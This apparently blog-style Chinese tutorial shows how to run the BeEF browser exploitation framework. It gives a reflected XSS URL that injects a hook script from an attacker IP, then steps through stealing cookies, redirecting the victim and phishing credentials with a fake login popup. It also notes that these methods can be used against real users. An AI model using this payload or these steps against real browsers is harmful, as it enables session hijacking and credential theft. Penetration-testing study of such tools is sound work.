BeFF的高级烹饪方式
BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具
Kali Linux内已经有BeEF的环境,只需要进入/usr/share/beef-xss
目录下,./beef
运行即可
cd /usr/share/beef-xss/
./beef
BeEF运行截图:
BeEF
启动之后会输出在终端
很多重要的信息
Browser Exploitation Framework (BeEF) 0.4.7.0-alpha(BeEF的版本是0.4.7.0)
12 extensions enabled(12个扩展)
254 modules enabled(254个利用模块)
接口控制面板::
running on network interface: 127.0.0.1
Hook URL: http://127.0.0.1:3000/hook.js
UI URL: http://127.0.0.1:3000/ui/panel
running on network interface: 192.168.1.106
Hook URL: http://192.168.1.106:3000/hook.js
UI URL: http://192.168.1.106:3000/ui/panel
URL:(下面两个都可以使用)
http://127.0.0.1:3000/ui/panel
http://192.168.1.106:3000/ui/panel
用户名/密码:beef
用户名密码的配置文件是:config.yaml
Before being able to fully explore the framework you will have to ‘hook’ a browser. To begin with you can point a browser towards the basic demo page here, or the advanced version here.
鼠标点击here
就可以让浏览器和BeEF挂钩(僵尸)
其中192.168.1.100
就是我物理机的IP
地址
下图是我们获取到的浏览器的信息:
包括浏览的URL
、Cookies
、Host Name/IP
、Date
、操作系统
…等等
其中Commands
标签页是BeEF执行大部分攻击模块的地方
绿色
的代表该功能有效
,并且执行不会被
用户所发现
橙色
的代表该功能有效
,但是执行会被
用户所发现
白色
的代表该功能不确定
是否有效
红色
的代表该功能无效
其中Rider
标签页可以让挂钩(僵尸)的浏览器作为一个代理
其中XssRays
标签页可以帮助我们让挂钩(僵尸)的浏览器的网站所在域
作为目标,然后通过BeEF框架搜索跨站脚本攻击
,允许我们让挂钩的网站上找到持久的跨站脚本漏洞攻击
的漏洞进行利用
其中Ipec
标签页可以在http
请求中使用http
以外的协议等等
因为我们使用的是BeEF自带的挂钩页面所演示,在实战中可以用反射类型的XSS来进行对用户的浏览器进行钓鱼、DNS欺骗、网站克隆等等操作
http://www.liuwx.cn/xss.php?="><script src="http://192.168.1.106:3000/hook.js"></script>
这时候BeEF
控制台就会看到一个新的挂钩(僵尸)浏览器:
来到Commands
标签-点击Browser
—>Hooked Domain
—>Get Cookie
,然后点击右下角的Execute
此时右边就可以看到浏览器的Cookie
了
来到Commands
标签-点击Browser
—>Hooked Domain
—>Redirect Browser
,然后点击右下角的Execute
,然后用户的浏览器的该页面就会跳转到http://www.liuwx.cn
的页面了。
成功跳转
来到Commands
标签-点击Social Engiineering
——>Pretty Theft
,然后右上角选择弹窗的类型,右下角点击 Execute
说实话,这个弹窗有点鸡肋,看上去太假了,建议不要使用这个
但是你只要在框内输入了
用户名和密码的话
如果僵尸
那边输入了用户名
和密码
,点击了登陆
的话,控制台是会收到账号密码
的
目前BeEF
使用就到这,后续遇到其他的玩法还会继续更新… …